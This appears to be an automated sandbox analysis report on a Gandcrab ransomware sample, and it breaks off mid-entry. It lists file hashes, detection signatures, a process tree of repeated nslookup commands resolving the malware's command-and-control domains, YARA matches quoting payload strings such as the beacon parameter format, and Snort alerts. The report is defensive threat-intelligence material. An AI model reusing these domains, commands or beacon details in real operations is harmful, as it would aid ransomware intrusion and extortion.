Edit tour

Windows Analysis Report
O8ZHhytWhn.exe

Overview

General Information

Sample Name:	O8ZHhytWhn.exe
Analysis ID:	694558
MD5:	b39febf7440b58a6cd15ae9f01916f98
SHA1:	66984e561fc5feead5ef9790f79bffd7778ac1e2
SHA256:	9c689986ca8e0b4fd93657ad9ed5c37994ccf591c90d5fba85684f2d0f49e1b9
Tags:	exe
Infos:

Detection

Gandcrab, ReflectiveLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Gandcrab

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected ReflectiveLoader

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Snort IDS alert for network traffic

Found evasive API chain (may stop execution after checking mutex)

Contains functionality to determine the online IP of the system

Found Tor onion address

Uses nslookup.exe to query domains

Machine Learning detection for sample

May check the online IP address of the machine

Performs many domain queries via nslookup

Machine Learning detection for dropped file

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Sample execution stops while process was sleeping (likely an evasion)

Too many similar processes found

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Queries information about the installed CPU (vendor, model number etc)

Drops PE files

Contains functionality to read the PEB

Found evaded block containing many API calls

Contains functionality to enumerate device drivers

Checks for available system drives (often done to infect USB drives)

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

O8ZHhytWhn.exe (PID: 5900 cmdline: "C:\Users\user\Desktop\O8ZHhytWhn.exe" MD5: B39FEBF7440B58A6CD15AE9F01916F98)

nslookup.exe (PID: 3600 cmdline: nslookup nomoreransom.coin dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 3116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 5496 cmdline: nslookup nomoreransom.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 5928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 3220 cmdline: nslookup gandcrab.bit dns2.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 5184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 4404 cmdline: nslookup nomoreransom.coin dns2.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 5708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 5224 cmdline: nslookup nomoreransom.bit dns2.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 5756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 4508 cmdline: nslookup gandcrab.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 1352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 5732 cmdline: nslookup nomoreransom.coin dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 2980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 4540 cmdline: nslookup nomoreransom.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 5756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 6132 cmdline: nslookup gandcrab.bit dns2.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 5376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 5896 cmdline: nslookup nomoreransom.coin dns2.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 1840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 1548 cmdline: nslookup nomoreransom.bit dns2.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 1836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 5864 cmdline: nslookup gandcrab.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 5588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 3840 cmdline: nslookup nomoreransom.coin dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 4412 cmdline: nslookup nomoreransom.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 4928 cmdline: nslookup gandcrab.bit dns2.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 4908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 5972 cmdline: nslookup nomoreransom.coin dns2.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 6012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 5164 cmdline: nslookup nomoreransom.bit dns2.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 4824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 5644 cmdline: nslookup gandcrab.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 2300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 5860 cmdline: nslookup nomoreransom.coin dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 5944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 6052 cmdline: nslookup nomoreransom.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 4372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 540 cmdline: nslookup gandcrab.bit dns2.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 2800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 6072 cmdline: nslookup nomoreransom.coin dns2.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 3144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 4324 cmdline: nslookup nomoreransom.bit dns2.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 4824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 1252 cmdline: nslookup gandcrab.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

wjaoab.exe (PID: 5444 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe" MD5: A1E6F4D9E1AF5740E07B86A42C6C430B)

wjaoab.exe (PID: 2888 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe" MD5: A1E6F4D9E1AF5740E07B86A42C6C430B)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
O8ZHhytWhn.exe	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xed22:$x1: ReflectiveLoader
O8ZHhytWhn.exe	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe67e:$: DECRYPT.txt 0xe6e4:$: DECRYPT.txt
O8ZHhytWhn.exe	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
O8ZHhytWhn.exe	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
O8ZHhytWhn.exe	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xed21:$s1: _ReflectiveLoader@ 0xed22:$s2: ReflectiveLoader@
O8ZHhytWhn.exe	Gandcrab	Gandcrab Payload	kevoreilly	0xe674:$string1: GDCB-DECRYPT.txt 0xe6da:$string1: GDCB-DECRYPT.txt 0xecb0:$string2: GandCrabGandCrabnomoreransom.coinomoreransom.bit 0xe3b0:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
Click to see the 1 entries

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xed22:$x1: ReflectiveLoader
C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe67e:$: DECRYPT.txt 0xe6e4:$: DECRYPT.txt
C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xed21:$s1: _ReflectiveLoader@ 0xed22:$s2: ReflectiveLoader@
C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Gandcrab	Gandcrab Payload	kevoreilly	0xe674:$string1: GDCB-DECRYPT.txt 0xe6da:$string1: GDCB-DECRYPT.txt 0xecb0:$string2: GandCrabGandCrabnomoreransom.coinomoreransom.bit 0xe3b0:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
Click to see the 1 entries

Memory Dumps

Source	Rule	Description	Author
00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000000.00000000.248593701.000000000F1E2000.00000008.00000001.01000000.00000003.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000019.00000000.308682011.000000000FBD2000.00000008.00000001.01000000.00000006.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000009.00000000.289875664.000000000FBD2000.00000008.00000001.01000000.00000006.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000009.00000000.289867124.000000000FBCA000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000019.00000000.308674547.000000000FBCA000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000000.00000000.248569401.000000000F1DA000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: O8ZHhytWhn.exe PID: 5900	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: O8ZHhytWhn.exe PID: 5900	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: wjaoab.exe PID: 5444	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: wjaoab.exe PID: 5444	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: wjaoab.exe PID: 2888	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: wjaoab.exe PID: 2888	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.0.wjaoab.exe.fbc0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xed22:$x1: ReflectiveLoader
9.0.wjaoab.exe.fbc0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe67e:$: DECRYPT.txt 0xe6e4:$: DECRYPT.txt
9.0.wjaoab.exe.fbc0000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
9.0.wjaoab.exe.fbc0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
9.0.wjaoab.exe.fbc0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xed21:$s1: _ReflectiveLoader@ 0xed22:$s2: ReflectiveLoader@
9.0.wjaoab.exe.fbc0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe674:$string1: GDCB-DECRYPT.txt 0xe6da:$string1: GDCB-DECRYPT.txt 0xecb0:$string2: GandCrabGandCrabnomoreransom.coinomoreransom.bit 0xe3b0:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
25.2.wjaoab.exe.fbc0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xed22:$x1: ReflectiveLoader
25.2.wjaoab.exe.fbc0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe67e:$: DECRYPT.txt 0xe6e4:$: DECRYPT.txt
25.2.wjaoab.exe.fbc0000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
25.2.wjaoab.exe.fbc0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
25.2.wjaoab.exe.fbc0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xed21:$s1: _ReflectiveLoader@ 0xed22:$s2: ReflectiveLoader@
25.2.wjaoab.exe.fbc0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe674:$string1: GDCB-DECRYPT.txt 0xe6da:$string1: GDCB-DECRYPT.txt 0xecb0:$string2: GandCrabGandCrabnomoreransom.coinomoreransom.bit 0xe3b0:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
25.0.wjaoab.exe.fbc0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xed22:$x1: ReflectiveLoader
25.0.wjaoab.exe.fbc0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe67e:$: DECRYPT.txt 0xe6e4:$: DECRYPT.txt
25.0.wjaoab.exe.fbc0000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
25.0.wjaoab.exe.fbc0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
25.0.wjaoab.exe.fbc0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xed21:$s1: _ReflectiveLoader@ 0xed22:$s2: ReflectiveLoader@
25.0.wjaoab.exe.fbc0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe674:$string1: GDCB-DECRYPT.txt 0xe6da:$string1: GDCB-DECRYPT.txt 0xecb0:$string2: GandCrabGandCrabnomoreransom.coinomoreransom.bit 0xe3b0:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
0.0.O8ZHhytWhn.exe.f1d0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xed22:$x1: ReflectiveLoader
0.0.O8ZHhytWhn.exe.f1d0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe67e:$: DECRYPT.txt 0xe6e4:$: DECRYPT.txt
0.2.O8ZHhytWhn.exe.f1d0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xed22:$x1: ReflectiveLoader
0.2.O8ZHhytWhn.exe.f1d0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe67e:$: DECRYPT.txt 0xe6e4:$: DECRYPT.txt
0.2.O8ZHhytWhn.exe.f1d0000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
0.2.O8ZHhytWhn.exe.f1d0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0.2.O8ZHhytWhn.exe.f1d0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xed21:$s1: _ReflectiveLoader@ 0xed22:$s2: ReflectiveLoader@
0.2.O8ZHhytWhn.exe.f1d0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe674:$string1: GDCB-DECRYPT.txt 0xe6da:$string1: GDCB-DECRYPT.txt 0xecb0:$string2: GandCrabGandCrabnomoreransom.coinomoreransom.bit 0xe3b0:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
0.0.O8ZHhytWhn.exe.f1d0000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
0.0.O8ZHhytWhn.exe.f1d0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0.0.O8ZHhytWhn.exe.f1d0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xed21:$s1: _ReflectiveLoader@ 0xed22:$s2: ReflectiveLoader@
0.0.O8ZHhytWhn.exe.f1d0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe674:$string1: GDCB-DECRYPT.txt 0xe6da:$string1: GDCB-DECRYPT.txt 0xecb0:$string2: GandCrabGandCrabnomoreransom.coinomoreransom.bit 0xe3b0:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
9.2.wjaoab.exe.fbc0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xed22:$x1: ReflectiveLoader
9.2.wjaoab.exe.fbc0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe67e:$: DECRYPT.txt 0xe6e4:$: DECRYPT.txt
9.2.wjaoab.exe.fbc0000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
9.2.wjaoab.exe.fbc0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
9.2.wjaoab.exe.fbc0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xed21:$s1: _ReflectiveLoader@ 0xed22:$s2: ReflectiveLoader@
9.2.wjaoab.exe.fbc0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe674:$string1: GDCB-DECRYPT.txt 0xe6da:$string1: GDCB-DECRYPT.txt 0xecb0:$string2: GandCrabGandCrabnomoreransom.coinomoreransom.bit 0xe3b0:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
Click to see the 31 entries

Snort Signatures

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.859550532026737 08/31/22-23:50:37.016810
SID:	2026737
Source Port:	59550
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.852106532026737 08/31/22-23:49:25.641298
SID:	2026737
Source Port:	52106
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.851142532829498 08/31/22-23:49:32.319799
SID:	2829498
Source Port:	51142
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.861174532829498 08/31/22-23:50:40.415440
SID:	2829498
Source Port:	61174
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.854194532829498 08/31/22-23:50:17.451854
SID:	2829498
Source Port:	54194
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.862910532026737 08/31/22-23:50:41.844460
SID:	2026737
Source Port:	62910
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.859114532829498 08/31/22-23:50:50.899719
SID:	2829498
Source Port:	59114
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.863192532829498 08/31/22-23:50:10.372925
SID:	2829498
Source Port:	63192
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.858786532026737 08/31/22-23:49:35.365431
SID:	2026737
Source Port:	58786
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.850026532026737 08/31/22-23:49:12.853058
SID:	2026737
Source Port:	50026
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.856776532829498 08/31/22-23:50:31.949356
SID:	2829498
Source Port:	56776
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.851012532026737 08/31/22-23:49:06.034483
SID:	2026737
Source Port:	51012
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.862438532026737 08/31/22-23:49:47.214941
SID:	2026737
Source Port:	62438
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.860840532829498 08/31/22-23:50:23.078640
SID:	2829498
Source Port:	60840
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.864080532829498 08/31/22-23:49:52.783908
SID:	2829498
Source Port:	64080
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.861175532829498 08/31/22-23:50:40.433841
SID:	2829498
Source Port:	61175
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.858288532829498 08/31/22-23:49:10.646822
SID:	2829498
Source Port:	58288
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.852107532026737 08/31/22-23:49:25.661867
SID:	2026737
Source Port:	52107
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.856775532829498 08/31/22-23:50:31.927813
SID:	2829498
Source Port:	56775
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.862020532026737 08/31/22-23:50:18.955251
SID:	2026737
Source Port:	62020
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.858751532829498 08/31/22-23:49:44.095609
SID:	2829498
Source Port:	58751
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.859548532026737 08/31/22-23:50:36.965761
SID:	2026737
Source Port:	59548
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.863191532829498 08/31/22-23:50:10.354216
SID:	2829498
Source Port:	63191
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.858750532829498 08/31/22-23:49:44.071935
SID:	2829498
Source Port:	58750
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.853340532829498 08/31/22-23:49:03.740944
SID:	2829498
Source Port:	53340
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.851141532829498 08/31/22-23:49:32.298424
